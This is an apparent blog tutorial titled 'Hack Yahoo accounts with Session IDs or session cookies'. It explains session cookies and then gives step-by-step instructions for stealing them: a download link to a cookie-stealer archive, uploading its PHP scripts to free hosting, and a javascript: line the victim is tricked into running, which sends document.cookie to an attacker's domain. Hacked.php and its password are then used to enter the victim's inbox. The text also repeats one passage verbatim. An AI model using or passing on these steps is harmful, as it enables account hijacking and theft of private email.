Hack Yahoo accounts with Session IDs or session cookies !
What
are session IDs or session cookies ?
Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and
other in our browser as cookie. Both are matched every time we do
anything in our account.
This piece of string or loginsession
is destroyed when we click on 'Sign Out' option.
You would get a pop up box showing you the cookies. Now login to your account
and do same thing, you would see more elements added to the cookies. These
represent sessions ids .
An attacker can steal
that session by convincing victim to run a piece of code in browser. Attacker
can use that stolen session to login into victim's account without providing
any username/password. This attack is very uncommon because when the victim
clicks 'Sign out' , session gets destroyed and attacker too also
gets signed out.
But in case of yahoo, its not the same.The attacker doesn’t get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.
Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar
Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.
2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.
But in case of yahoo, its not the same.The attacker doesn’t get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.
Requirement: Download some files from here
http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar
Tutorial to steal session IDs :-
1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.
2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.
3. Give
this code to victim to run in his browser when he would be logged in to
his yahoo account. Yahoo.php is
basically cookie stealing script and hacked.php executes the stolen cookies in
browser.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.
4. Open
the hacked.php . The password is 'explore'.
You must have got the username of victim's account. Simply
Click on it and it would take you to inbox of victim's yahoo account
without asking for any password.
Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.
Now it doesn't matter if victim signs out from his account, you
would remain logged into it.
